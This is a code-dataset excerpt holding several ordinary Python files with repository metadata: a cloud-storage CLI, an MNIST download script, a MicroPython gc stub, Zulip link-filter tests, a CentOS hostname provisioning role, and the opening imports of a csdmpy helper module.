Dataset schema (⌀ marks nullable columns):

hexsha: string (length 40)
size: int64 (2 to 1.02M)
ext: string (10 classes)
lang: string (1 class)
max_stars_repo_path: string (length 4 to 245)
max_stars_repo_name: string (length 6 to 130)
max_stars_repo_head_hexsha: string (length 40)
max_stars_repo_licenses: list (length 1 to 10)
max_stars_count: int64 (1 to 191k) ⌀
max_stars_repo_stars_event_min_datetime: string (length 24) ⌀
max_stars_repo_stars_event_max_datetime: string (length 24) ⌀
max_issues_repo_path: string (length 4 to 245)
max_issues_repo_name: string (length 6 to 130)
max_issues_repo_head_hexsha: string (length 40)
max_issues_repo_licenses: list (length 1 to 10)
max_issues_count: int64 (1 to 67k) ⌀
max_issues_repo_issues_event_min_datetime: string (length 24) ⌀
max_issues_repo_issues_event_max_datetime: string (length 24) ⌀
max_forks_repo_path: string (length 4 to 245)
max_forks_repo_name: string (length 6 to 130)
max_forks_repo_head_hexsha: string (length 40)
max_forks_repo_licenses: list (length 1 to 10)
max_forks_count: int64 (1 to 105k) ⌀
max_forks_repo_forks_event_min_datetime: string (length 24) ⌀
max_forks_repo_forks_event_max_datetime: string (length 24) ⌀
content: string (length 2 to 1.02M)
avg_line_length: float64 (1 to 417k)
max_line_length: int64 (1 to 987k)
alphanum_fraction: float64 (0 to 1)
content_no_comment: string (length 0 to 1.01M)
is_comment_constant_removed: bool (1 class)
is_sharp_comment_removed: bool (1 class)
hexsha: 1c4456f331c5f34771a86f26632a47558e095202 | size: 3,198 | ext: py | lang: Python
max_stars_repo: systran_storages/bin/storages_cli.py | nguyendc-systran/storages | d31a18953ce9ce3d9b791f94b02837bfa156cb1a | licenses: ["MIT"] | count: null | events: null to null
max_issues_repo: systran_storages/bin/storages_cli.py | nguyendc-systran/storages | d31a18953ce9ce3d9b791f94b02837bfa156cb1a | licenses: ["MIT"] | count: 1 | events: 2019-12-11T15:44:34.000Z to 2019-12-11T15:44:34.000Z
max_forks_repo: systran_storages/bin/storages_cli.py | nguyenhn-systran/storages | d0f2a3b2b217313cca0980a43865811135e3f6a3 | licenses: ["MIT"] | count: null | events: null to null
content:
#!/usr/bin/env python
# coding: utf-8
from systran_storages import StorageClient
import argparse
import json
import six
import os
import logging
from datetime import datetime


def resolvedpath(path):
    fields = path.split(':')
    if not len(fields) == 2 or not fields[1].startswith('/'):
        # ArgumentTypeError is the exception argparse expects from a type= callable
        raise argparse.ArgumentTypeError("incorrect storage path: %s" % path)
    return path


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-c', '--config', default=None, required=True,
                        help='Storages configuration file.')
    parser.add_argument('--info', '-v', action='store_true', help='info mode')
    parser.add_argument('--verbose', '-vv', action='store_true', help='verbose mode')
    subparsers = parser.add_subparsers(help='command help', dest='cmd')
    subparsers.required = True
    parser_list = subparsers.add_parser('list', help='list file on a storage')
    parser_list.add_argument('--recursive', '-r', action='store_true', help='recursive listing')
    parser_list.add_argument('storage', type=resolvedpath, help='path to list')
    parser_get = subparsers.add_parser('get', help='download a file or directory')
    parser_get.add_argument('storage', type=resolvedpath,
                            help='path to file or directory to download, directory must end with /')
    parser_get.add_argument('local', type=str, help='local path')
    parser_get = subparsers.add_parser('push', help='upload a file or directory')
    parser_get.add_argument('local', type=str, help='local path to file or directory to upload')
    parser_get.add_argument('storage', type=resolvedpath,
                            help='remote path')
    parser_stat = subparsers.add_parser('stat', help='returns stat on a remote file/directory')
    parser_stat.add_argument('storage', type=resolvedpath, help='remote path')
    args = parser.parse_args()

    if args.info:
        logging.basicConfig(level=logging.INFO)
    if args.verbose:
        logging.basicConfig(level=logging.DEBUG)

    with open(args.config) as jsonf:
        config = json.load(jsonf)
    # support configuration from automatic tests
    if 'storages' in config:
        config = config['storages']
    client = StorageClient(config=config)

    if args.cmd == "list":
        listdir = client.listdir(args.storage, args.recursive)
        for k in sorted(listdir.keys()):
            if listdir[k].get("is_dir"):
                print("dir", k)
            else:
                date = datetime.fromtimestamp(listdir[k]["last_modified"])
                print("   ", "%10d" % listdir[k]["size"], date.strftime("%Y-%m-%dT%H:%M:%S"), k)
    elif args.cmd == "get":
        directory = args.storage.endswith('/')
        if directory:
            if os.path.isfile(args.local):
                raise ValueError("%s should be a directory" % args.local)
            client.get_directory(args.storage, args.local)
        else:
            client.get_file(args.storage, args.local)
    elif args.cmd == "push":
        client.push(args.local, args.storage)
    elif args.cmd == "stat":
        print(client.stat(args.storage))


if __name__ == "__main__":
    main()
avg_line_length: 38.071429 | max_line_length: 101 | alphanum_fraction: 0.642276
content_no_comment:
from systran_storages import StorageClient
import argparse
import json
import six
import os
import logging
from datetime import datetime


def resolvedpath(path):
    fields = path.split(':')
    if not len(fields) == 2 or not fields[1].startswith('/'):
        raise argparse.ArgumentTypeError("incorrect storage path: %s" % path)
    return path


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-c', '--config', default=None, required=True,
                        help='Storages configuration file.')
    parser.add_argument('--info', '-v', action='store_true', help='info mode')
    parser.add_argument('--verbose', '-vv', action='store_true', help='verbose mode')
    subparsers = parser.add_subparsers(help='command help', dest='cmd')
    subparsers.required = True
    parser_list = subparsers.add_parser('list', help='list file on a storage')
    parser_list.add_argument('--recursive', '-r', action='store_true', help='recursive listing')
    parser_list.add_argument('storage', type=resolvedpath, help='path to list')
    parser_get = subparsers.add_parser('get', help='download a file or directory')
    parser_get.add_argument('storage', type=resolvedpath,
                            help='path to file or directory to download, directory must end with /')
    parser_get.add_argument('local', type=str, help='local path')
    parser_get = subparsers.add_parser('push', help='upload a file or directory')
    parser_get.add_argument('local', type=str, help='local path to file or directory to upload')
    parser_get.add_argument('storage', type=resolvedpath,
                            help='remote path')
    parser_stat = subparsers.add_parser('stat', help='returns stat on a remote file/directory')
    parser_stat.add_argument('storage', type=resolvedpath, help='remote path')
    args = parser.parse_args()

    if args.info:
        logging.basicConfig(level=logging.INFO)
    if args.verbose:
        logging.basicConfig(level=logging.DEBUG)

    with open(args.config) as jsonf:
        config = json.load(jsonf)
    if 'storages' in config:
        config = config['storages']
    client = StorageClient(config=config)

    if args.cmd == "list":
        listdir = client.listdir(args.storage, args.recursive)
        for k in sorted(listdir.keys()):
            if listdir[k].get("is_dir"):
                print("dir", k)
            else:
                date = datetime.fromtimestamp(listdir[k]["last_modified"])
                print("   ", "%10d" % listdir[k]["size"], date.strftime("%Y-%m-%dT%H:%M:%S"), k)
    elif args.cmd == "get":
        directory = args.storage.endswith('/')
        if directory:
            if os.path.isfile(args.local):
                raise ValueError("%s should be a directory" % args.local)
            client.get_directory(args.storage, args.local)
        else:
            client.get_file(args.storage, args.local)
    elif args.cmd == "push":
        client.push(args.local, args.storage)
    elif args.cmd == "stat":
        print(client.stat(args.storage))


if __name__ == "__main__":
    main()
is_comment_constant_removed: true | is_sharp_comment_removed: true
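For orientation, a minimal, hypothetical sketch of driving this CLI follows. The config layout and the `python -m` entry point are assumptions for illustration, not the documented systran_storages schema.

# Hypothetical usage sketch for storages_cli.py. The config keys below are
# illustrative only; the real schema is defined by systran_storages.
import json
import subprocess

config = {"storages": {"store1": {"type": "local", "basedir": "/tmp/store"}}}
with open("storages.json", "w") as f:
    json.dump(config, f)

# Storage paths take the form "<storage_id>:/<path>", which is exactly what
# resolvedpath() validates in the script above.
subprocess.run(
    ["python", "-m", "systran_storages.bin.storages_cli",
     "-c", "storages.json", "list", "store1:/"],
    check=False,  # the storage backend may not exist in this sketch
)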
hexsha: 1c44575a4ea6fbb81f6c44d4ca1a80d7726a22b8 | size: 3,002 | ext: py | lang: Python
max_stars_repo: research/rebar/download_data.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | licenses: ["Apache-2.0"] | count: 82,518 | events: 2016-02-05T12:07:23.000Z to 2022-03-31T23:09:47.000Z
max_issues_repo: research/rebar/download_data.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | licenses: ["Apache-2.0"] | count: 9,021 | events: 2016-03-08T01:02:05.000Z to 2022-03-31T08:06:35.000Z
max_forks_repo: research/rebar/download_data.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | licenses: ["Apache-2.0"] | count: 54,341 | events: 2016-02-06T17:19:55.000Z to 2022-03-31T10:27:44.000Z
content:
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Download MNIST, Omniglot datasets for Rebar."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import urllib
import gzip
import os
import config
import struct
import numpy as np
import cPickle as pickle
import datasets

MNIST_URL = 'see README'
MNIST_BINARIZED_URL = 'see README'
OMNIGLOT_URL = 'see README'
MNIST_FLOAT_TRAIN = 'train-images-idx3-ubyte'


def load_mnist_float(local_filename):
  with open(local_filename, 'rb') as f:
    f.seek(4)
    nimages, rows, cols = struct.unpack('>iii', f.read(12))
    dim = rows*cols
    images = np.fromfile(f, dtype=np.dtype(np.ubyte))
    images = (images/255.0).astype('float32').reshape((nimages, dim))
  return images


if __name__ == '__main__':
  if not os.path.exists(config.DATA_DIR):
    os.makedirs(config.DATA_DIR)

  # Get MNIST and convert to npy file
  local_filename = os.path.join(config.DATA_DIR, MNIST_FLOAT_TRAIN)
  if not os.path.exists(local_filename):
    urllib.urlretrieve("%s/%s.gz" % (MNIST_URL, MNIST_FLOAT_TRAIN), local_filename+'.gz')
    with gzip.open(local_filename+'.gz', 'rb') as f:
      file_content = f.read()
    with open(local_filename, 'wb') as f:
      f.write(file_content)
    os.remove(local_filename+'.gz')
  mnist_float_train = load_mnist_float(local_filename)[:-10000]
  # save in a nice format
  np.save(os.path.join(config.DATA_DIR, config.MNIST_FLOAT), mnist_float_train)

  # Get binarized MNIST
  splits = ['train', 'valid', 'test']
  mnist_binarized = []
  for split in splits:
    filename = 'binarized_mnist_%s.amat' % split
    url = '%s/binarized_mnist_%s.amat' % (MNIST_BINARIZED_URL, split)
    local_filename = os.path.join(config.DATA_DIR, filename)
    if not os.path.exists(local_filename):
      urllib.urlretrieve(url, local_filename)
    with open(local_filename, 'rb') as f:
      mnist_binarized.append((np.array([map(int, line.split()) for line in f.readlines()]).astype('float32'), None))
  # save in a nice format
  with open(os.path.join(config.DATA_DIR, config.MNIST_BINARIZED), 'w') as out:
    pickle.dump(mnist_binarized, out)

  # Get Omniglot
  local_filename = os.path.join(config.DATA_DIR, config.OMNIGLOT)
  if not os.path.exists(local_filename):
    urllib.urlretrieve(OMNIGLOT_URL,
                       local_filename)
avg_line_length: 33.355556 | max_line_length: 116 | alphanum_fraction: 0.70453
content_no_comment:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import urllib
import gzip
import os
import config
import struct
import numpy as np
import cPickle as pickle
import datasets

MNIST_URL = 'see README'
MNIST_BINARIZED_URL = 'see README'
OMNIGLOT_URL = 'see README'
MNIST_FLOAT_TRAIN = 'train-images-idx3-ubyte'


def load_mnist_float(local_filename):
  with open(local_filename, 'rb') as f:
    f.seek(4)
    nimages, rows, cols = struct.unpack('>iii', f.read(12))
    dim = rows*cols
    images = np.fromfile(f, dtype=np.dtype(np.ubyte))
    images = (images/255.0).astype('float32').reshape((nimages, dim))
  return images


if __name__ == '__main__':
  if not os.path.exists(config.DATA_DIR):
    os.makedirs(config.DATA_DIR)

  local_filename = os.path.join(config.DATA_DIR, MNIST_FLOAT_TRAIN)
  if not os.path.exists(local_filename):
    urllib.urlretrieve("%s/%s.gz" % (MNIST_URL, MNIST_FLOAT_TRAIN), local_filename+'.gz')
    with gzip.open(local_filename+'.gz', 'rb') as f:
      file_content = f.read()
    with open(local_filename, 'wb') as f:
      f.write(file_content)
    os.remove(local_filename+'.gz')
  mnist_float_train = load_mnist_float(local_filename)[:-10000]
  np.save(os.path.join(config.DATA_DIR, config.MNIST_FLOAT), mnist_float_train)

  splits = ['train', 'valid', 'test']
  mnist_binarized = []
  for split in splits:
    filename = 'binarized_mnist_%s.amat' % split
    url = '%s/binarized_mnist_%s.amat' % (MNIST_BINARIZED_URL, split)
    local_filename = os.path.join(config.DATA_DIR, filename)
    if not os.path.exists(local_filename):
      urllib.urlretrieve(url, local_filename)
    with open(local_filename, 'rb') as f:
      mnist_binarized.append((np.array([map(int, line.split()) for line in f.readlines()]).astype('float32'), None))
  with open(os.path.join(config.DATA_DIR, config.MNIST_BINARIZED), 'w') as out:
    pickle.dump(mnist_binarized, out)

  local_filename = os.path.join(config.DATA_DIR, config.OMNIGLOT)
  if not os.path.exists(local_filename):
    urllib.urlretrieve(OMNIGLOT_URL,
                       local_filename)
is_comment_constant_removed: true | is_sharp_comment_removed: true
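This file is Python 2 code (`urllib.urlretrieve`, `cPickle`, a list-returning `map`). For readers on Python 3, a minimal sketch of the equivalent calls:

# Python 3 equivalents of the Python 2 idioms used in download_data.py above.
# Illustrative only; the original script targets Python 2.
import pickle                            # replaces `import cPickle as pickle`
from urllib.request import urlretrieve   # replaces urllib.urlretrieve

# urlretrieve(url, filename)             # same call shape as in the script

with open("data.pkl", "wb") as out:      # pickle requires binary mode in py3
    pickle.dump([("sketch", None)], out)

# map() returns an iterator in py3; wrap it to keep the py2 list semantics:
row = list(map(int, "0 1 0 1".split()))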
hexsha: 1c44589d3c730e035ab6ff91365665923d59240b | size: 241 | ext: py | lang: Python
max_stars_repo: gc.py | rundekugel/micropythonemu | d135f7389f1f13fe33dda58778958ea74680fdbc | licenses: ["MIT"] | count: null | events: null to null
max_issues_repo: gc.py | rundekugel/micropythonemu | d135f7389f1f13fe33dda58778958ea74680fdbc | licenses: ["MIT"] | count: null | events: null to null
max_forks_repo: gc.py | rundekugel/micropythonemu | d135f7389f1f13fe33dda58778958ea74680fdbc | licenses: ["MIT"] | count: null | events: null to null
content:
# dummy lib
"""
dummy library gc to emulate esp8266 micropython on a PC with python3
incomplete
2022 by lifesim.de
"""
from gc import *


def mem_alloc():
    return 1000


def mem_free():
    return -1


def threshold(a):
    return -1

#eof
avg_line_length: 12.05 | max_line_length: 68 | alphanum_fraction: 0.684647
content_no_comment:
from gc import *


def mem_alloc():
    return 1000


def mem_free():
    return -1


def threshold(a):
    return -1
is_comment_constant_removed: true | is_sharp_comment_removed: true
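One subtlety worth noting: CPython's `gc` is a built-in module, so a file named gc.py does not shadow it on a plain `import gc`; presumably the emulator loads the stub explicitly. A sketch of exercising it that way:

# Sketch: load the stub under a distinct name so CPython's built-in gc does
# not win the import. Inside the stub, `from gc import *` re-exports the real
# module's functions (collect, enable, ...), with the three overrides on top.
import importlib.util

spec = importlib.util.spec_from_file_location("gc_stub", "gc.py")
gc_stub = importlib.util.module_from_spec(spec)
spec.loader.exec_module(gc_stub)

print(gc_stub.mem_alloc())  # stubbed: always 1000
print(gc_stub.mem_free())   # stubbed: always -1
gc_stub.collect()           # real CPython function, re-exported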
hexsha: 1c4459fbff634a63bf3eb4a631d67077bb257f72 | size: 5,415 | ext: py | lang: Python
max_stars_repo: zerver/tests/test_realm_filters.py | kenclary/zulip | 0267ba54b286a783dbde9a31d8ee2a0971671f73 | licenses: ["Apache-2.0"] | count: 2 | events: 2021-09-01T17:44:28.000Z to 2021-09-01T18:09:51.000Z
max_issues_repo: zerver/tests/test_realm_filters.py | kenclary/zulip | 0267ba54b286a783dbde9a31d8ee2a0971671f73 | licenses: ["Apache-2.0"] | count: 1 | events: 2021-03-24T12:50:52.000Z to 2021-03-24T13:11:42.000Z
max_forks_repo: zerver/tests/test_realm_filters.py | kenclary/zulip | 0267ba54b286a783dbde9a31d8ee2a0971671f73 | licenses: ["Apache-2.0"] | count: null | events: null to null
content:
import re

from zerver.lib.actions import do_add_realm_filter
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import RealmFilter, get_realm


class RealmFilterTest(ZulipTestCase):
    def test_list(self) -> None:
        self.login("iago")
        realm = get_realm("zulip")
        do_add_realm_filter(realm, "#(?P<id>[123])", "https://realm.com/my_realm_filter/%(id)s")
        result = self.client_get("/json/realm/filters")
        self.assert_json_success(result)
        self.assertEqual(200, result.status_code)
        self.assertEqual(len(result.json()["filters"]), 1)

    def test_create(self) -> None:
        self.login("iago")
        data = {"pattern": "", "url_format_string": "https://realm.com/my_realm_filter/%(id)s"}
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(result, "This field cannot be blank.")

        data["pattern"] = "$a"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(
            result, "Invalid filter pattern. Valid characters are [ a-zA-Z_#=/:+!-]."
        )

        data["pattern"] = r"ZUL-(?P<id>\d++)"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(
            result, "Invalid filter pattern. Valid characters are [ a-zA-Z_#=/:+!-]."
        )

        data["pattern"] = r"ZUL-(?P<id>\d+)"
        data["url_format_string"] = "$fgfg"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(result, "Enter a valid URL.")

        data["pattern"] = r"ZUL-(?P<id>\d+)"
        data["url_format_string"] = "https://realm.com/my_realm_filter/"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(result, "Invalid URL format string.")

        data["url_format_string"] = "https://realm.com/my_realm_filter/#hashtag/%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "ZUL-15"))

        data["pattern"] = r"ZUL2-(?P<id>\d+)"
        data["url_format_string"] = "https://realm.com/my_realm_filter/?value=%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "ZUL2-15"))

        data["pattern"] = r"_code=(?P<id>[0-9a-zA-Z]+)"
        data["url_format_string"] = "https://example.com/product/%(id)s/details"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "_code=123abcdZ"))

        data["pattern"] = r"PR (?P<id>[0-9]+)"
        data[
            "url_format_string"
        ] = "https://example.com/~user/web#view_type=type&model=model&action=12345&id=%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "PR 123"))

        data["pattern"] = r"lp/(?P<id>[0-9]+)"
        data["url_format_string"] = "https://realm.com/my_realm_filter/?value=%(id)s&sort=reverse"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "lp/123"))

        data["pattern"] = r"lp:(?P<id>[0-9]+)"
        data["url_format_string"] = "https://realm.com/my_realm_filter/?sort=reverse&value=%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "lp:123"))

        data["pattern"] = r"!(?P<id>[0-9]+)"
        data[
            "url_format_string"
        ] = "https://realm.com/index.pl?Action=AgentTicketZoom;TicketNumber=%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "!123"))

        data["pattern"] = r"(?P<org>[a-zA-Z0-9_-]+)/(?P<repo>[a-zA-Z0-9_-]+)#(?P<id>[0-9]+)"
        data["url_format_string"] = "https://github.com/%(org)s/%(repo)s/issue/%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "zulip/zulip#123"))

    def test_not_realm_admin(self) -> None:
        self.login("hamlet")
        result = self.client_post("/json/realm/filters")
        self.assert_json_error(result, "Must be an organization administrator")
        result = self.client_delete("/json/realm/filters/15")
        self.assert_json_error(result, "Must be an organization administrator")

    def test_delete(self) -> None:
        self.login("iago")
        realm = get_realm("zulip")
        filter_id = do_add_realm_filter(
            realm, "#(?P<id>[123])", "https://realm.com/my_realm_filter/%(id)s"
        )
        filters_count = RealmFilter.objects.count()
        result = self.client_delete(f"/json/realm/filters/{filter_id + 1}")
        self.assert_json_error(result, "Filter not found")

        result = self.client_delete(f"/json/realm/filters/{filter_id}")
        self.assert_json_success(result)
        self.assertEqual(RealmFilter.objects.count(), filters_count - 1)
avg_line_length: 46.282051 | max_line_length: 98 | alphanum_fraction: 0.628994
content_no_comment:
import re

from zerver.lib.actions import do_add_realm_filter
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import RealmFilter, get_realm


class RealmFilterTest(ZulipTestCase):
    def test_list(self) -> None:
        self.login("iago")
        realm = get_realm("zulip")
        do_add_realm_filter(realm, "#(?P<id>[123])", "https://realm.com/my_realm_filter/%(id)s")
        result = self.client_get("/json/realm/filters")
        self.assert_json_success(result)
        self.assertEqual(200, result.status_code)
        self.assertEqual(len(result.json()["filters"]), 1)

    def test_create(self) -> None:
        self.login("iago")
        data = {"pattern": "", "url_format_string": "https://realm.com/my_realm_filter/%(id)s"}
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(result, "This field cannot be blank.")

        data["pattern"] = "$a"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(
            result, "Invalid filter pattern. Valid characters are [ a-zA-Z_#=/:+!-]."
        )

        data["pattern"] = r"ZUL-(?P<id>\d++)"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(
            result, "Invalid filter pattern. Valid characters are [ a-zA-Z_#=/:+!-]."
        )

        data["pattern"] = r"ZUL-(?P<id>\d+)"
        data["url_format_string"] = "$fgfg"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(result, "Enter a valid URL.")

        data["pattern"] = r"ZUL-(?P<id>\d+)"
        data["url_format_string"] = "https://realm.com/my_realm_filter/"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_error(result, "Invalid URL format string.")

        data["url_format_string"] = "https://realm.com/my_realm_filter/#hashtag/%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "ZUL-15"))

        data["pattern"] = r"ZUL2-(?P<id>\d+)"
        data["url_format_string"] = "https://realm.com/my_realm_filter/?value=%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "ZUL2-15"))

        data["pattern"] = r"_code=(?P<id>[0-9a-zA-Z]+)"
        data["url_format_string"] = "https://example.com/product/%(id)s/details"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "_code=123abcdZ"))

        data["pattern"] = r"PR (?P<id>[0-9]+)"
        data[
            "url_format_string"
        ] = "https://example.com/~user/web#view_type=type&model=model&action=12345&id=%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "PR 123"))

        data["pattern"] = r"lp/(?P<id>[0-9]+)"
        data["url_format_string"] = "https://realm.com/my_realm_filter/?value=%(id)s&sort=reverse"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "lp/123"))

        data["pattern"] = r"lp:(?P<id>[0-9]+)"
        data["url_format_string"] = "https://realm.com/my_realm_filter/?sort=reverse&value=%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "lp:123"))

        data["pattern"] = r"!(?P<id>[0-9]+)"
        data[
            "url_format_string"
        ] = "https://realm.com/index.pl?Action=AgentTicketZoom;TicketNumber=%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "!123"))

        data["pattern"] = r"(?P<org>[a-zA-Z0-9_-]+)/(?P<repo>[a-zA-Z0-9_-]+)#(?P<id>[0-9]+)"
        data["url_format_string"] = "https://github.com/%(org)s/%(repo)s/issue/%(id)s"
        result = self.client_post("/json/realm/filters", info=data)
        self.assert_json_success(result)
        self.assertIsNotNone(re.match(data["pattern"], "zulip/zulip#123"))

    def test_not_realm_admin(self) -> None:
        self.login("hamlet")
        result = self.client_post("/json/realm/filters")
        self.assert_json_error(result, "Must be an organization administrator")
        result = self.client_delete("/json/realm/filters/15")
        self.assert_json_error(result, "Must be an organization administrator")

    def test_delete(self) -> None:
        self.login("iago")
        realm = get_realm("zulip")
        filter_id = do_add_realm_filter(
            realm, "#(?P<id>[123])", "https://realm.com/my_realm_filter/%(id)s"
        )
        filters_count = RealmFilter.objects.count()
        result = self.client_delete(f"/json/realm/filters/{filter_id + 1}")
        self.assert_json_error(result, "Filter not found")

        result = self.client_delete(f"/json/realm/filters/{filter_id}")
        self.assert_json_success(result)
        self.assertEqual(RealmFilter.objects.count(), filters_count - 1)
is_comment_constant_removed: true | is_sharp_comment_removed: true
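The `ZUL-(?P<id>\d++)` case relies on the fact that possessive quantifiers are a syntax error for Python's `re` module (support only arrived in Python 3.11), so compiling the pattern fails server-side. A quick demonstration:

# Why the ZUL-(?P<id>\d++) pattern is rejected: on the Python versions Zulip
# supported here, re.compile raises re.error for possessive quantifiers.
import re

try:
    re.compile(r"ZUL-(?P<id>\d++)")
    print("compiled fine (Python >= 3.11 added possessive quantifiers)")
except re.error as exc:
    print("rejected:", exc)  # e.g. "multiple repeat at position 12"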
hexsha: 1c445a8d09e9a4ab77e1462718f5caec6da3dc69 | size: 1,404 | ext: py | lang: Python
max_stars_repo: provy/more/centos/utils/hostname.py | timgates42/provy | ca3d5e96a2210daf3c1fd4b96e047efff152db14 | licenses: ["MIT"] | count: 15 | events: 2015-01-28T15:49:28.000Z to 2021-09-02T18:49:46.000Z
max_issues_repo: provy/more/centos/utils/hostname.py | timgates42/provy | ca3d5e96a2210daf3c1fd4b96e047efff152db14 | licenses: ["MIT"] | count: null | events: null to null
max_forks_repo: provy/more/centos/utils/hostname.py | timgates42/provy | ca3d5e96a2210daf3c1fd4b96e047efff152db14 | licenses: ["MIT"] | count: 3 | events: 2016-12-05T07:08:11.000Z to 2021-12-26T04:31:05.000Z
content:
#!/usr/bin/python
# -*- coding: utf-8 -*-

'''
Roles in this namespace are meant to provide hostname utility methods within CentOS distributions.
'''

from fabric.contrib.files import sed
from fabric.api import settings, hide

from provy.core import Role


class HostNameRole(Role):
    def ensure_hostname(self, hostname):
        '''
        Ensure a fixed hostname is configured in the server.

        :param hostname: Hostname to be created.
        :type hostname: :class:`str`

        Example:
        ::

            class MySampleRole(Role):
                def provision(self):
                    with self.using(HostNameRole) as role:
                        role.ensure_hostname('rabbit')
        '''
        if hostname == self.execute('hostname'):
            return False

        path = '/etc/sysconfig/network'
        file = self.read_remote_file(path)
        hostname_line = 'HOSTNAME={0}'.format(hostname)
        self.log('Setting up hostname')
        if 'HOSTNAME' not in file:
            self.ensure_line(hostname_line, stdout=False, sudo=True)
        else:
            with settings(hide('warnings', 'running', 'stdout')):
                sed(path, 'HOSTNAME=.*', hostname_line, use_sudo=True)
        self.execute(
            'hostname "{0}"'.format(hostname), stdout=False, sudo=True,
        )
        self.log('Hostname %s added' % hostname)
        return True
avg_line_length: 27 | max_line_length: 100 | alphanum_fraction: 0.590456
content_no_comment:
from fabric.contrib.files import sed
from fabric.api import settings, hide

from provy.core import Role


class HostNameRole(Role):
    def ensure_hostname(self, hostname):
        if hostname == self.execute('hostname'):
            return False

        path = '/etc/sysconfig/network'
        file = self.read_remote_file(path)
        hostname_line = 'HOSTNAME={0}'.format(hostname)
        self.log('Setting up hostname')
        if 'HOSTNAME' not in file:
            self.ensure_line(hostname_line, stdout=False, sudo=True)
        else:
            with settings(hide('warnings', 'running', 'stdout')):
                sed(path, 'HOSTNAME=.*', hostname_line, use_sudo=True)
        self.execute(
            'hostname "{0}"'.format(hostname), stdout=False, sudo=True,
        )
        self.log('Hostname %s added' % hostname)
        return True
is_comment_constant_removed: true | is_sharp_comment_removed: true
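The else-branch delegates the in-place rewrite to Fabric's `sed` helper. For reference, a minimal pure-Python sketch of the same replacement logic:

# Sketch of the HOSTNAME rewrite that fabric.contrib.files.sed performs on
# the remote /etc/sysconfig/network: replace any HOSTNAME=... line in place.
import re

def rewrite_hostname(contents: str, hostname: str) -> str:
    hostname_line = 'HOSTNAME={0}'.format(hostname)
    if 'HOSTNAME' not in contents:
        return contents + hostname_line + '\n'
    return re.sub(r'HOSTNAME=.*', hostname_line, contents)

print(rewrite_hostname("NETWORKING=yes\nHOSTNAME=old-host\n", "rabbit"))
# NETWORKING=yes
# HOSTNAME=rabbit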
hexsha: 1c445ac0474100a6d6ada83425a4ce570d51ea83 | size: 17,999 | ext: py | lang: Python
max_stars_repo: csdmpy/helper_functions.py | DeepanshS/csdmpy | ae8d20dd09f217bb462af67a3145bb6fcb025def | licenses: ["BSD-3-Clause"] | count: 7 | events: 2020-01-04T20:46:08.000Z to 2021-05-26T21:09:25.000Z
max_issues_repo: csdmpy/helper_functions.py | deepanshs/csdmpy | bd4e138b10694491113b10177a89305697f1752c | licenses: ["BSD-3-Clause"] | count: 16 | events: 2021-06-09T06:28:27.000Z to 2022-03-01T18:12:33.000Z
max_forks_repo: csdmpy/helper_functions.py | deepanshs/csdmpy | bd4e138b10694491113b10177a89305697f1752c | licenses: ["BSD-3-Clause"] | count: 1 | events: 2020-01-03T17:04:16.000Z to 2020-01-03T17:04:16.000Z
content:
# -*- coding: utf-8 -*-
"""Helper functions."""
from copy import deepcopy
from warnings import warn

import matplotlib.projections as proj
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.image import NonUniformImage

__author__ = "Deepansh J. Srivastava"
